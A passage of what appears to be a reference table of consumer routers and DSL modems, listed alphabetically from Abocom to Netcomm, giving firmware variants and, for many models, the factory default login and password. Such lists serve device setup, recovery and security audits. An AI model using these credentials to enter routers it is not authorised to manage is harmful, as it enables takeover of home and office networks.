(Abocom Firmware) admin  Accton – CheetahAccess AC-IG1004 (Accton Firmware)   Acorp – LAN410 (Acorp Firmware) admin admin Actiontec – GT701 (Actiontec Firmware)   Actiontec – GT701 v2 (Qwest Firmware)   Actiontec – GT701WG v2 (Qwest Firmware)   Actiontec – GT701-WRU (Actiontec Firmware)   Actiontec – GT704-WG (Actiontec v3.0 Firmware)   Actiontec – GT704WG (Actiontec v3.20 Firmware) admin password Actiontec – GT704WG (Qwest Firmware)   Actiontec – GT704WG (Verizon Firmware) admin password Actiontec – GT724WGR (Actiontec Firmware)   Actiontec – M1000 (Qwest v1 Firmware)   Actiontec – M1000 (Qwest v2 Firmware)   Actiontec – MI424WR (Verizon Firmware) admin password1 Actiontec – MI424WR-GEN2 (Verizon Firmware) admin password1 Actiontec – PK5000 (Qwest Firmware)   Actiontec – Q1000 (Qwest Firmware)   Actiontec – R1520SU (Qwest Firmware)   Actiontec – RI408 (Actiontec Firmware) admin password1 Addon – GWAR3000 (Addon Firmware) Admin Admin Addon – GWAR3500 (Addon Firmware) admin admin Advantek Networks – AWR-854G (Advantek Networks Firmware) admin admin Aethra – EB1060 (Aethra Firmware) admin password Aethra – FS4104-AW (Aethra Firmware) admin  Aethra – SV1042 (Aethra Firmware) admin  AGK Nordic – WA-4054 (AGK Nordic Firmware)  admin AirLink – AR430W (AirLink Firmware) admin admin AirLink – AR525W (AirLink Firmware) admin admin AirLink – AR670W (AirLink Firmware) admin admin Airlive – Ovislink IP-1000R (Airlive Firmware) admin airlive Airlive – WL-8064ARM (Airlive Firmware) admin airlive Airlive – WT-2000ARM (Airlive Firmware) admin airlive Airlive – WT-2000R (Airlive Firmware) admin ecom Airties – RT-101 (Airties Turkish Firmware)   Airties – RT-104 (Airties Turkish Firmware)   Airties – RT-204 (Airties Firmware)   Airties – RT-205 (Airties Turkish Firmware)   Airties – RT-211 (Airties EN, GR & TR Firmware)   Airties – Wav-180 (Airties Turkish Firmware)   Alice – AH4021 v2 (Alice French Firmware) alice alice Alice – Gate 2 Plus (Telecom Italia Firmware)   Alice – Gate Voip 2 Plus Wi-Fi (Alice Italian Firmware)   Alice – Gate W2+ (Telecom Italia Firmware)   Alice – IAD WLAN 3231 (Alice German Firmware)   A-Link – RoadRunner 24AP (A-Link Firmware) admin password A-Link – RR24 (A-Link Firmware) admin password A-Link – WL54AP3 (A-Link Firmware)   Allied Data – Copperjet 1616P2 (Allied Data Firmware) user user Allied Telesyn – AT-ARW256E (Allied Telesyn Firmware) manager friend Allnet – ALL1296 (Allnet Firmware)   Alpha Networks Inc – IGD (Alpha Networks Firmware) admin  Alvarion – BreezeMax (Alvarion Firmware) admin admin Ambit – U10C019 (Ambit Firmware) admin cableroot Ambit – U10C022 (Ambit Firmware) admin cableroot Aolynk – DR814Q (Aolynk Firmware) admin admin AOpen – AOI-908 (Aopen Firmware)  admin AOpen – AOR-401 (AOpen Firmware) admin 1234 Arcor – DSL-Easybox 602 (Vodafone German Firmware) root 123456 Arlotto – RB14S (Arlotto Firmware) admin 0000 Arris – WTM552 (Arris Firmware)   Articonet – ACN – 110R (Articonet Firmware) admin admin Asus – AAM6020BI (Asus Firmware) admin admin Asus – AAM6020VI-T4 (Asus Firmware) admin admin Asus – AM602 (Asus Firmware) admin admin Asus – AM604 (Asus Firmware) admin admin Asus – AR7WRD (Asus Firmware) admin 1234 Asus – DSL-N13 (Asus Firmware) admin admin Asus – RT-G32 (Asus Firmware) admin admin Asus – RT-N15 (Asus Firmware) admin admin Asus – RX3041 (Asus Firmware) admin admin Asus – WL-500G (Asus Firmware) admin admin Asus – WL-500GP V2 (Asus Firmware) admin admin Asus – WL-500W (Asus Firmware) admin admin Asus – WL-520G (Asus Firmware) admin admin Asus – WL-520GC (Asus Firmware) admin admin Asus – WL-520GU (Asus Firmware) admin admin Asus – WL-530G (Asus Firmware) admin admin Asus – WL-566gM (Asus Firmware) admin admin Asus – WL-600G (Asus Firmware) admin admin Asus – WL-700GE (Asus Firmware) admin admin Asus – WL-AM604G (Asus Firmware) admin admin Ativa – 54G (Ativa Firmware)   Atlantis Land – A02RBW54 (Atlantis Land Firmware) admin admin Atlantis Land – VoIPMaster 260W (Atlantis Land Firmware) admin atlantis Atlantis Land – Webshare 141W (Atlantis Land Firmware) admin admin Atlantis Land – WebShare 242W (Atlantis Land Firmware) admin admin AusLinx – AL-2007 (Conexant Firmware)   Axesstel – CDMA 1xEV-D0 (Axesstel Firmware) admin admin Axesstel – MV400i (Axesstel Firmware) admin admin Axesstel – MV430i (Axesstel Firmware) admin admin Aztech – DSL1015EN (Aztech Firmware) admin admin Aztech – DSL305EU (Aztech Firmware)   Aztech – DSL605ER (Aztech Firmware) admin admin Aztech – DSL605EW (Aztech Firmware) admin admin AzureWave – AW-NR580 (AzureWave Firmware)   Bandluxe – R100 (Bandluxe Firmware) admin hsparouter Bandridge – CWN7007G (Bandridge Firmware)   BaudTec – T263R1U (BaudTec Firmware) admin 1234 BaudTec – TW263R4-A0 (BaudTec Firmware) admin 1234 BEC – 7402TM (BEC Firmware) admin admin Beetel – 110BX1 (Beetel Firmware) admin password Beetel – 110TC1 (Beetel Firmware) admin password Beetel – 220BX (Beetel Firmware) admin password Beetel – 220BXI (Beetel Firmware) admin password Beetel – 450BXI (Beetel Firmware) admin password Beetel – 450TC1 (Beetel Firmware) admin 1234 Belgacom – B-Box 2 (Belgacom Firmware)  admin Belgacom – BBOX 6726 (Belgacom Firmware)  admin Belkin – F1PI241EGau (iinet.net.au Firmware)  admin Belkin – F1PI242EGau (iinet.net.au Firmware)  admin Belkin – F5D5231-4 (Belkin Firmware)   Belkin – F5D6321-4 (Belkin Firmware)   Belkin – F5D7230-4 v1 (Belkin Firmware)   Belkin – F5D7230-4 v2 (Belkin Firmware)   Belkin – F5D7230-4 v6 (Belkin Firmware)   Belkin – F5D7230-4 v7 (Belkin Firmware)   Belkin – F5D7230-4 v8 (Belkin Firmware)   Belkin – F5D7230-4 v9 (Belkin Firmware)   Belkin – F5D7231-4 (Belkin Firmware)   Belkin – F5D7231-4 v2 (Belkin Firmware)   Belkin – F5D7231-4P v1 (Belkin Firmware)   Belkin – F5D7234-4 v1 (Belkin Firmware)   Belkin – F5D7234-4 v3 (Belkin Firmware)   Belkin – F5D7234-4 v3 (Belkin v3.00.03 Firmware)   Belkin – F5D7234-4 v4 (Belkin Firmware)   Belkin – F5D7234-4 v5 (Belkin Firmware)   Belkin – F5D7630-4 (Belkin Firmware)   Belkin – F5D7632-4 v1 (Belkin Firmware)   Belkin – F5D7633-4 UK (Belkin Firmware)   Belkin – F5D7634-4 (Belkin Firmware)   Belkin – F5D8230-4 (Belkin Firmware)   Belkin – F5D8231-4 v2 (Belkin Firmware)   Belkin – F5D8231-4 v5 (Belkin Firmware)   Belkin – F5D8232-4 v1 (Belkin Firmware)   Belkin – F5D8233-4 v1 (Belkin Firmware)   Belkin – F5D8233-4 v3 (Belkin Firmware)   Belkin – F5D8233-4 v4 (Belkin Firmware)   Belkin – F5D8235-4 v1 (Belkin Firmware)   Belkin – F5D8235-4 v2 (Belkin Firmware)   Belkin – F5D8236-4 v1 (Belkin Firmware)   Belkin – F5D8236-4 v2 (Belkin Firmware)   Belkin – F5D8236-4 v3 (Belkin Firmware)   Belkin – F5D8631-4 v2 (Belkin Firmware)   Belkin – F5D8631-4 v3 (Belkin Español Firmware)   Belkin – F5D8631-4 v3 (Belkin Firmware)   Belkin – F5D8632-4 v1 (Belkin Firmware)   Belkin – F5D8633-4 v1 (Belkin Firmware)   Belkin – F5D8635-4 v1 (Belkin Firmware)   Belkin – F5D8636-4 v1 (Belkin Firmware)   Belkin – F5D8636-4 v2 (Belkin Firmware)   Belkin – F5D9230-4 v5 (Belkin Firmware)   Belkin – F5D9231-4 v1 (Belkin Firmware)   Belkin – F5D9630-4 (Belkin Firmware)   Belkin – F5D9630-4 UK (Belkin Firmware)   Belkin – F6D4230-4 v3 (Belkin Firmware)   Belkin – F6D4320-4 v1 (Belkin Firmware)   Belkin – F6D4630-4 v1 (Belkin Firmware)   BestData – EA142 (Conexant Firmware) root root Bewan – 600 G (Bewan French Firmware) bewan bewan Billion – BiPac 5100A (Billion Firmware) admin admin Billion – BiPac 5102S (Billion Firmware) admin admin Billion – BiPac 5112S (Billion Firmware) admin password Billion – BiPac 5200G (Billion Firmware) admin admin Billion – BiPac 5200N (Billion Firmware) admin admin Billion – BiPac 5210S (Billion Firmware) admin admin Billion – BiPac 7300G (Billion Firmware) admin admin Billion – BiPac 7300RA (Billion Firmware) admin admin Billion – BiPac 7402GXL (Billion Firmware) admin admin Billion – BiPac 7404VNPX (Billion Firmware) admin admin Billion – BiPac 7500G (Billion Firmware) admin password Black Copper – BCWR54G (Black Copper Firmware) guest guest BLUE COM – BCOM-5330 (BLUE COM Firmware) admin admin BLUE COM – BCOM-5390 (BLUE COM Firmware) Admin Admin Bountiful – BWRG500 (Bountiful Firmware) admin admin BSNL – DNA-A211-1 (BSNL Firmware) admin admin BT – HOME HUB 1.0 (BT Firmware)   BT – HOME HUB 2.0 (BT Firmware) admin admin BT – Voyager 2100 (BT Firmware) admin admin BT – Voyager 2110 (BT Firmware) admin admin BT – Voyager 220v (BT Firmware) admin admin BT – Voyager 2500v (BT Firmware) admin admin Buffalo – WHR-G (Buffalo Japanese Firmware) root  Buffalo – WHR-G54S (Buffalo Firmware) root  Buffalo – WHR-G54S (Buffalo Firmware) admin admin Buffalo – WZR2-G300N (Buffalo Firmware) root  Buffalo – WZR2-G300N (Buffalo Japanese Firmware) root  Buffalo – WZR-HP-G300NH (Buffalo Firmware) root  Canyon – CN-BR1 (Canyon Firmware) admin admin Canyon – CN-WF514 (Canyon Firmware) admin 1234 Caremo – X8268R (Caremo Firmware) admin admin Cerberus – ADSL Wifi 802.11g (Cerberus Firmware) Admin Admin Cisco – EPC2325 (Cisco Firmware)  admin Cisco – EPC2425 (Cisco Firmware)  admin CNET – CAR-845 (Texas Instruments Firmware) Admin Admin CNet – CNAD804-NF (Conexant Firmware) admin epicrouter CNet – CWR-854V (CNet Firmware) root 1234 Comstar – WA-6202-V2 (Comstar Firmware)   Comtrend – AR-5321U (Comtrend Firmware) admin admin Comtrend – CT-5072S (Comtrend Firmware) root 1234 Comtrend – CT-536+ (Comtrend Firmware) 1234 1234 Comtrend – CT-5361 (Comtrend Firmware) admin admin Comtrend – CT-5361T (Comtrend Firmware) root 12345 Comtrend – CT-5367 (Comtrend Firmware) admin admin Comtrend – CT-5611 (Comtrend Firmware) root 1234 Comtrend – CT-5621 (Comtrend Firmware) root 1234 Comtrend – CT-6383 (Comtrend Firmware) user pass Conceptronic – C54APRA (Conceptronic Firmware) admin admin Conceptronic – C54BRS4 (Conceptronic Firmware) admin 1234 Conceptronic – C54BRS4A (Conceptronic Firmware) admin admin Conitech – CN405APRT54 (Conitech Firmware) admin admin Conitech – CN416EU (Conitech Firmware) admin admin Conitech – CNKITADSLWL54 (Conitech Firmware) admin admin Connection N&C RBW54 (Connection N&C Firmware) admin admin Cradlepoint – MBR1000 (Cradlepoint Firmware)   Creative – Wireless ADSL 8426 (Creative Firmware) admin admin Darelink – DSL136E (Darelink Firmware)   Davolink – DV-201AM (Davolink Firmware) user user Davolink – DV-201AMR (Davolink Firmware) user user Davolink – DV-2020 (Davolink Firmware) user user Dell – 2350 (Dell Firmware) admin password Deltaco – WLAN-104 (Deltaco Firmware)   Digicom – 8E4411 (Digicom Firmware) admin admin Digicom – Adsl2 Combo (Digicom Firmware) admin admin Digicom – DDSL-101R (Digicom Firmware) admin admin Digicom – Michelangelo LAN TX II (Digicom Firmware) admin admin Digicom – Michelangelo Wave (Digicom Firmware) admin admin Digicom – Michelangelo Wave 108 (Digicom Firmware)  admin Digiconnect – WIC328 (Digiconnect Firmware) admin 1234 D-Link – DGL-4100 (D-Link Firmware) admin  D-Link – DGL-4300 (D-Link Firmware) admin  D-Link – DGL-4500 (D-Link Firmware) admin  D-Link – DI-524 (D-Link v2 Firmware) admin  D-Link – DI-524 (D-Link v3 Firmware) admin  D-Link – DI-524 (D-Link v5 Firmware) admin  D-Link – DI-524UP (D-Link Firmware) admin  D-Link – DI-604 (D-Link Firmware) admin  D-Link – DI-604 (D-Link Russian Firmware) admin  D-Link – DI-604+ (D-Link Chinese Firmware) admin  D-Link – DI-614+ (D-Link Firmware) admin  D-Link – DI-624 (D-Link v4 Firmware) admin  D-Link – DI-624 (D-Link v5 Firmware) admin  D-Link – DI-624S (D-Link Firmware) admin admin D-Link – DI-634M (D-Link Firmware) admin  D-Link – DI-704P (D-Link Firmware) admin  D-Link – DI-704UP (D-Link Firmware) admin  D-Link – DI-808HV (D-Link Firmware) admin  D-Link – DI-824VUP (D-Link Firmware) admin  D-Link – DI-LB604 (D-Link Firmware) admin  D-Link – DIR-100 (D-Link Firmware) admin  D-Link – DIR-280 (D-Link Firmware) admin  D-Link – DIR-300 (D-Link Firmware) admin  D-Link – DIR-301 (D-Link Firmware) admin  D-Link – DIR-400 (D-Link v1 Firmware) admin  D-Link – DIR-600 (D-Link Firmware) admin  D-Link – DIR-615 (D-Link v1 Firmware) admin  D-Link – DIR-615 (D-Link v2 Firmware) admin  D-Link – DIR-615 (D-Link v3 Firmware) admin  D-Link – DIR-615 (D-Link v4 Firmware) admin  D-Link – DIR-625 (D-Link v1 Firmware) admin  D-Link – DIR-625 (D-Link v3 Firmware) admin  D-Link – DIR-628 (D-Link Firmware) admin  D-Link – DIR-635 (D-Link Firmware) admin  D-Link – DIR-655 (D-Link Firmware) admin  D-Link – DIR-825 (D-Link Firmware) admin  D-Link – DIR-855 (D-Link Firmware) admin  D-Link – DSL-2500U (D-Link Firmware) admin admin D-Link – DSL-2520U (D-Link Firmware) admin admin D-Link – DSL-2540B (D-Link Firmware) admin admin D-Link – DSL-2540T (D-Link Firmware) admin admin D-Link – DSL-2540U (D-Link Firmware) admin admin D-Link – DSL-2542B (D-Link Firmware) admin admin D-Link – DSL-2600U (D-Link Firmware) admin admin D-Link – DSL-2640B (D-Link Firmware) admin admin D-Link – DSL-2640R (D-Link Firmware) admin admin D-Link – DSL-2640T (D-Link Firmware) admin admin D-Link – DSL-2640U (D-Link Firmware) admin admin D-Link – DSL-2641B (D-Link Firmware) admin admin D-Link – DSL-2740B (D-Link Firmware) admin admin D-Link – DSL-2740R (D-Link Firmware) admin admin D-Link – DSL-2741B (D-Link Firmware) admin admin D-Link – DSL-302G (D-Link Firmware) admin admin D-Link – DSL-500B (D-Link Firmware) admin admin D-Link – DSL-500G (D-Link Firmware) admin  D-Link – DSL-500G Generation II (D-Link Firmware) admin admin D-Link – DSL-500T (D-Link Firmware) admin admin D-Link – DSL-502G (D-Link Firmware) admin admin D-Link – DSL-502T (D-Link Firmware) admin admin D-Link – DSL-504G (D-Link Firmware) admin admin D-Link – DSL-504T (D-Link Firmware) admin admin D-Link – DSL-520B (D-Link Firmware) admin admin D-Link – DSL-520T (D-Link Firmware) admin admin D-Link – DSL-522T (D-Link Firmware) admin admin D-Link – DSL-524B (D-Link Firmware) admin admin D-Link – DSL-524T (D-Link Firmware) admin admin D-Link – DSL-584T (D-Link Firmware) admin admin D-Link – DSL-G604T (D-Link Firmware) admin admin D-Link – DSL-G624M (D-Link Firmware) admin admin D-Link – DSL-G624T (D-Link v3.0 Firmware) admin admin D-Link – DSL-G624T (D-Link v3.1 Firmware) admin admin D-Link – DSL-G804V (D-Link Firmware) admin admin D-Link – DVA-G3170i (D-Link Firmware) admin admin D-Link – DVA-G3340S (D-Link Firmware) admin admin D-Link – DVA-G3670B (D-Link Firmware) admin admin D-Link – DVA-G3810BN (Telus Firmware) admin telus D-Link – DVA-G3810BNTL (Telus Firmware) admin telus D-Link – EBR-2310 (D-Link v1 Firmware) admin  D-Link – EBR-2310 (D-Link v2 Firmware) admin  D-Link – GLB-502C (D-Link Firmware) admin admin D-Link – GLB-502T (D-Link Firmware) admin admin D-Link – GLB-802C (D-Link Firmware)   D-Link – VWR (Vontage Firmware) user user D-Link – WBR-1310 (D-Link v2 Firmware) admin  D-Link – WBR-1310 (D-Link v4 Firmware) admin  D-Link – WBR-2310 (D-Link Firmware) admin  Dovado – UMR (Dovado Firmware) admin 0000 Draytek – Vigor2200E-Plus (Draytek Firmware) admin admin Draytek – Vigor2500 (Draytek Firmware) admin admin Draytek – Vigor2700 (Draytek Firmware) user user Draytek – Vigor2700e (Draytek Firmware) admin admin Draytek – Vigor2800vg (Draytek Firmware) admin admin Draytek – Vigor2820 (Draytek Firmware) user user Draytek – Vigor2910 (Draytek Firmware) admin admin Draytek – Vigor2930 (Draytek Firmware) user user DSE – XH9948 (DSE Firmware) admin password DSE – XH9950 (DSE Firmware) admin password DSLink – 260E (DSLink Firmware) root root Dynalink – RTA1025W (Dynalink Firmware) admin admin Dynalink – RTA1320 (Dynalink Firmware) admin admin Dynalink – RTA220 (Dynalink Firmware)  admin Dynamode – BR-6004 W-G1 (Dynamode Firmware) guest guest Dynamode – R-ADSL-C4W-EG (Dynamode Firmware) admin password Dynex – DX-E401 (Dynex Firmware) admin  Dynex – DX-E402 (Dynex Firmware) admin password Dynex – DX-WEGRTR v1 (Dynex Firmware)   Eci – B-FOCuS 342+ WTR (Eci Firmware) admin password Ecom – EW125TGAR (Ecom Firmware) admin ecom Edimax – 3G-6200WG (Edimax Firmware) admin 1234 Edimax – AR-7024Wg (Edimax Firmware) admin epicrouter Edimax – AR-7064 A (Edimax Firmware) admin admin Edimax – AR-7084G A (Edimax Firmware) admin 1234 Edimax – BR-6104K (Edimax Firmware) admin 1234 Edimax – BR-6104KP (Edimax Firmware)   Edimax – BR-6204WG (Edimax Firmware) admin 1234 Edimax – BR-6204WLG (Edimax Firmware) admin 1234 Edimax – BR-6216Mg (Edimax Firmware) admin 1234 Edimax – BR-6504N (Edimax Firmware) admin 1234 Edimax – BR-6624 (Edimax Firmware) admin  Eminent – EM3032 (Eminent Firmware)  admin Eminent – EM4012 (Eminent Firmware)  admin Eminent – EM4013 (Eminent Firmware)  admin Eminent – EM4040 nShare (Eminent Firmware)  admin Eminent – EM4204 (Eminent Firmware) Admin Admin Eminent – EM4218 (Eminent Firmware) admin admin Eminent – EM4420 (Eminent Firmware) admin admin Eminent – EM4422 nShare (Eminent Firmware)  admin Eminent – EM4551 wLINK 300 Pro (Eminent Firmware) admin admin Encore – ENDSL-A2+WIGX2 v1 (ENCORE Firmware) admin trendchip Encore – ENDSL-AR4 (Conexant Firmware) admin conexant Encore – ENHWI-G IEEE 802.11g (Encore Firmware) admin admin Encore – ENHWI-G2 (Encore Firmware) admin admin Encore – ENHWI-G3 (Encore Firmware) admin admin Encore – ENHWI-N (Encore Firmware) admin admin Encore – ENHWI-SG (Encore Firmware) admin admin Encore – ENRTR-104 (Encore Firmware)  admin Engenius – ESR-9750G (Engenius Firmware) admin admin Engenius – ESR-9850 (Engenius Firmware) admin admin Ericsson – HN294dp (Ericsson Firmware) admin admin Ericsson – W25 (Ericsson Firmware) admin admin E-tech – RTBR01 (E-tech Firmware)  admin E-tech – RTBR03 (E-tech Firmware)  admin E-tech – WGRT04 (E-tech Firmware) admin admin E-tech – WLRT03 (E-tech Firmware)  admin Etisalat – e960 (Etisalat Firmware)   Eumex – 300IP (Eumex German Firmware)   Exper – ECM-01 (Exper Turkish Firmware) admin ttnet Fritz!Box – Fon WLAN 7050 (Fritz!Box German Firmware)   Fritz!Box – Fon WLAN 7141 (Fritz!Box German Firmware)   Fritz!Box – Fon WLAN 7170 (Fritz!Box Firmware)   Fritz!Box – Fon WLAN 7240 (Fritz!Box Firmware)   Fujitel – FCC-W541R (Fujitel Firmware) admin admin Generic – 4-Port 802.11g 54Mbps (Check Router Pic) admin admin Gigabyte – GN-B41G (Gigabyte Firmware) admin admin GlobalTronic – GTR 2401KP (GlobalTronic Firmware) admin admin Gnet – IP0006 (Gnet Firmware)  admin GTS – Telecom (GTS Firmware) admin admin Haltel – HTN-5200 (Haltel Firmware) admin admin Hamlet – HNWS254 (Hamlet Firmware) admin  Hamlet – HRDSL512W_R (Hamlet Firmware) admin hamlet Hamlet – HRDSL5400W (Hamlet Firmware) admin hamlet Hatari – HW-AA101 (TrendChip Firmware) admin 1234 Hawking – HWR54G (Hawking Firmware) admin  Hayes – 15810 (Hayes Firmware) admin hayesadsl Hfcl – ADSL (Hfcl Firmware) admin password Huawei – B933 (Smart Bro Firmware)   Huawei – E960 (Etisalat Firmware)   Huawei – E960 (STC Firmware) admin admin Huawei – Echolife HG510 (Huawei Firmware) admin admin Huawei – Echolife HG510 (Romania Tel Firmware) admin admin Huawei – Echolife HG510 (Serbian Telekom Firmware) admin admin Huawei – EchoLife HG520b (Huawei Firmware) admin admin Huawei – EchoLife HG520b (TT Firmware) admin admin Huawei – EchoLife HG520i (To2Proxy Firmware) admin admin Huawei – EchoLife HG520s (Saudi Telecom Firmware) Afaq_shamel stccpe_2007 Huawei – EchoLife HG520s (TT Firmware) admin admin Huawei – Echolife HG553 (Vodafone Italian Firmware)   Huawei – GlobeSurfer II (Virgin Broadband Firmware) virgin password Huawei – Quidway WA1003A (Huawei Firmware) admin admin Huawei – SmartAX MT841 (Huawei Firmware) admin admin Huawei – SmartAX MT880 (Huawei Firmware) admin admin Huawei – SmartAX MT880 (Triple-T Firmware) admin admin Huawei – SmartAX MT880 (Version E.37 Firmware) admin admin Huawei – SmartAX MT882 (CanTV Firmware) admin admin Huawei – SmartAX MT882 (JazzTel Firmware) admin admin Huawei – SmartAX MT882 (Opal Firmware) admin admin Huawei – SmartAX MT882 (SrpskeTel Firmware) admin admin Huawei – SmartAX MT882a (FAWRI Firmware) admin admin Huawei – SmartAX MT882a (Huawei Firmware) admin admin Huawei – SmartAX MT882a (Viettel Firmware) admin admin Icidu – NI-707513 (Icidu Firmware) admin password Inexq – ISO50T (Inexq Firmware) admin 1234 Intelbras – GKM 1200 E (Intelbras Firmware) admin admin Intelbras – GKM 1210 Q (Intelbras Portuguese Firmware) admin admin Intelbras – WRG 240 E (Intelbras Portuguese Firmware) admin admin Intellinet – 523431 (Intellinet Firmware) root  Intellinet – 523455 (Intellinet Firmware) admin admin Inteno – EG101 (Inteno Firmware) admin admin Intercross – xDSL 5633 E (Uhtepkpocc Firmware) admin admin Intracom – JetSpeed IAD-Wp2 (Intracom Firmware) telekom telekom Intracom – NetFasteR IAD (Intracom Firmware) admin admin Intracom – NetFasteR IAD 2 (Intracom Firmware) admin admin Inventel – DV4210-WA (Livebox French Firmware) admin admin Inventel – DV4210-WS (Livebox Firmware) admin admin IP-Com – R402+ (IP-Com Chinese Firmware) admin admin ipTime – IP0803 (ipTime Firmware) root  ipTime – N604M (ipTime Korean Firmware)   Iskratel – SI2000 Callisto821+ (Iskratel Firmware) admin admin Jensen Scandinavia – Air:link 2954 (Jensen Scandinavia Firmware) admin admin Jensen Scandinavia – Air:link 59300 (Jensen Scandinavia Firmware) admin 1234 Jensen Scandinavia – Air:link 89300 (Jensen Scandinavia Firmware) admin 1234 Jnet – JN-DS5400 (Jnet Firmware) admin password Kaiomy – 550B-4P (Kaiomy Firmware) admin epicrouter Kaiomy – 550B-4P2 (Kaiomy Firmware) admin admin Kaiomy – APR-4P (Kaiomy Firmware) guest guest Kasda – KD318MUI (Kasda Firmware) admin adslroot Kasda – V2Plus (Kasda Firmware) admin adslroot KCORP – KLG-575 (KCORP Firmware) admin admin KCORP – KLS-575 (KCORP Firmware)   KCORP – KLS-5810 (KCORP Firmware) admin password Keyteck – NET-25GSU (Keyteck Firmware) admin admin Kobishi – 8K (Kobishi Firmware)   Konig – CMP-WNROUT10 (Konig Firmware) admin admin Konig – CMP-WNROUT30 (Konig Firmware) admin 1234 Kozumi – K-5400GR (Kozumi Firmware) guest guest Kozumi – KM-410WG (Kozumi Firmware) admin admin Kraun – Kr.1W (Kraun Firmware) admin admin Kraun – Kr.XL (Kraun Firmware) admin admin Kyocera – KR2 (Kyocera Firmware)  admin Lantech – AR-2000 (Conexant Firmware) root root Levelone – FBR-1161A (Levelone Firmware) admin admin Levelone – WBR-3406TX (Levelone Firmware) admin admin Levelone – WBR-3408 (Levelone Firmware) admin  Levelone – WBR-3800 (Levelone Firmware)  password Levelone – WBR-6001 (Levelone Firmware)  password Leviton – GB4 (Leviton Firmware) admin admin Linkpro – A2WR-430A (Linkpro Firmware) admin admin Linkskey – LKR-604 (Linkskey Firmware) admin  Linksys – AG241 (Linksys Firmware) admin admin Linksys – AM200 (Linksys Firmware) admin admin Linksys – AM300 (Linksys Firmware) admin admin Linksys – BEFSR11 (Linksys Firmware)  admin Linksys – BEFSR41 (Linksys v1 Firmware)  admin Linksys – BEFSR41 (Linksys v2 Firmware)  admin Linksys – BEFSR41v4 (Linksys Firmware)  admin Linksys – BEFSR81 (Linksys Firmware)  admin Linksys – BEFSRU31 (Linksys Firmware)  admin Linksys – BEFSX41 (Linksys Firmware)  admin Linksys – BEFW11S4 (Linksys Firmware)  admin Linksys – NR041 (Network Everywhere Firmware)  admin Linksys – RT31P2 (Linksys Firmware)  admin Linksys – RTP300 (Linksys Firmware) admin admin Linksys – RV042 (Linksys Firmware) admin admin Linksys – RVS 4000 (Linksys Firmware) admin admin Linksys – SPA-2100 (Linksys Firmware)  admin Linksys – SPA-2102 (Linksys Firmware)  admin Linksys – SPA-3102 (Linksys Firmware)  admin Linksys – WAG160N (Linksys Italian Firmware)  admin Linksys – WAG200G (Linksys Portuguese Firmware)  admin Linksys – WAG300N (Linksys Portuguese Firmware) admin admin Linksys – WAG325N (Linksys Firmware) admin admin Linksys – WAG354G (Linksys Firmware)  admin Linksys – WAG54G2 (Linksys Firmware) admin admin Linksys – WAG54GS (Linksys Firmware) admin admin Linksys – WCG200 ver.2 (Linksys Firmware)  admin Linksys – WCG200-CC (Comcast Firmware) comcast 1234 Linksys – WRH54G (Linksys Firmware)  admin Linksys – WRK54G (Linksys Firmware)  admin Linksys – WRT100 (Linksys Firmware)  admin Linksys – WRT110 (Linksys Firmware)  admin Linksys – WRT120N (Linksys Firmware) admin admin Linksys – WRT150N (Linksys Firmware)  admin Linksys – WRT160N (Linksys Firmware)  admin Linksys – WRT160N v2 (Linksys Firmware)  admin Linksys – WRT160N v3 (Linksys Firmware)  admin Linksys – WRT300N (Linksys Firmware)  admin Linksys – WRT300N v1.1 (Linksys Firmware) admin admin Linksys – WRT310N (Linksys Firmware)  admin Linksys – WRT320N (Linksys Firmware)  admin Linksys – WRT350N (Linksys Firmware)  admin Linksys – WRT400N (Linksys Firmware)  admin Linksys – WRT54G (Hyperlite Firmware)  admin Linksys – WRT54G (Linksys Firmware)  admin Linksys – WRT54G (Linksys v2 Firmware)  admin Linksys – WRT54G (Linksys v4 Firmware)  admin Linksys – WRT54G (Linksys v8 Firmware)  admin Linksys – WRT54G (Satori-4.0 Firmware By Sveasoft)  admin Linksys – WRT54G (Talisman Firmware) admin admin Linksys – WRT54G2 (Linksys v1.0 Firmware)  admin Linksys – WRT54G2 (Linksys v1.5 Firmware)  admin Linksys – WRT54G3G (Linksys Italian Firmware) admin admin Linksys – WRT54GC (Linksys Firmware)  admin Linksys – WRT54GC (Linksys Italian Firmware)  admin Linksys – WRT54GH (Linksys Firmware) admin admin Linksys – WRT54GL (Linksys Firmware)  admin Linksys – WRT54GP2A-AT (Linksys Firmware)  admin Linksys – WRT54GS (Linksys Firmware)  admin Linksys – WRT54GS (Linksys v7 Firmware)  admin Linksys – WRT54GS2 (Linksys Firmware)  admin Linksys – WRT54G-TM (Linksys Firmware)  admin Linksys – WRT54GX2 (Linksys Firmware)  admin Linksys – WRT54GX4 (Linksys Firmware)  admin Linksys – WRT55AG (Linksys Firmware)  admin Linksys – WRT600N (Linksys Firmware)  admin Linksys – WRT610N (Linksys Firmware)  admin Linksys – WRTP54G (Linksys Firmware) admin admin Linksys – WRTU54G-TM (Linksys Firmware) admin admin Linksys – WRV200 (Linksys Firmware)  admin Linksys – WRVS4400N (Linksys Firmware) admin admin Mecer – WAR25TC (Addon Firmware) admin admin Meetus – AMT1004 (Meetus Firmware) admin adslnadam Mercury – MW54R (Mercury Chinese Firmware) admin admin Microcom – AD 2656 (Microcom Firmware) admin epicrouter Micronet – SP3361 (Micronet Firmware) admin trendchip Micronet – SP888B (Micronet Firmware) admin admin Micronet – SP916GK (Micronet Firmware) admin 1234 Microsoft – MN-100 (Microsoft Firmware)  admin Microsoft – MN-500 (Microsoft Firmware)  admin Microsoft – MN-700 (Microsoft Firmware)  admin Motorola – CPEo 450 (Motorola Firmware)   Motorola – Netopia 2210-02 (AT&T Firmware)   Motorola – Netopia 2241N-VGX (Bell Shouth Firmware)   Motorola – Netopia 2241N-VGX (Netopia Firmware)   Motorola – Netopia 2247-02 (Eircom Firmware)   Motorola – Netopia 3346N-VGx (Motorola Italian Firmware)   Motorola – Netopia 3347-02 (Qwest Firmware)   Motorola – Netopia 3347NWG-006 (Netopia Firmware)   Motorola – Netopia Cayman 3346-006 (Netopia Firmware) admin 1234 Motorola – SBG900 (Motorola Firmware) admin motorola Motorola – SVG2500 (Motorola Firmware) admin motorola Motorola – VT2142 (Motorola Firmware) router router Motorola – VT2442 (Motorola Firmware) router router Motorola – VT2542 (Motorola Firmware) router router Motorola – WR850G (Motorola Firmware) admin motorola MSI – RG54SE II (MSI Firmware) admin admin MSI – RG60G (MSI Firmware) admin admin MTNL – MT882 (MTNL Firmware) Admin Admin My Essentials – ME 1004-R (My Essentials Firmware)   Mymax – Access Point 54mbps (Mymax Firmware) admin password Myungmin – MWC-2500PW (Myungmin Firmware)   Netcomm – NB1300 Plus 4 (Netcomm Firmware) admin password Netcomm – NB5 (Netcomm Firmware) admin admin Netcomm – NB5Plus4 (Netcomm Firmware) admin admin 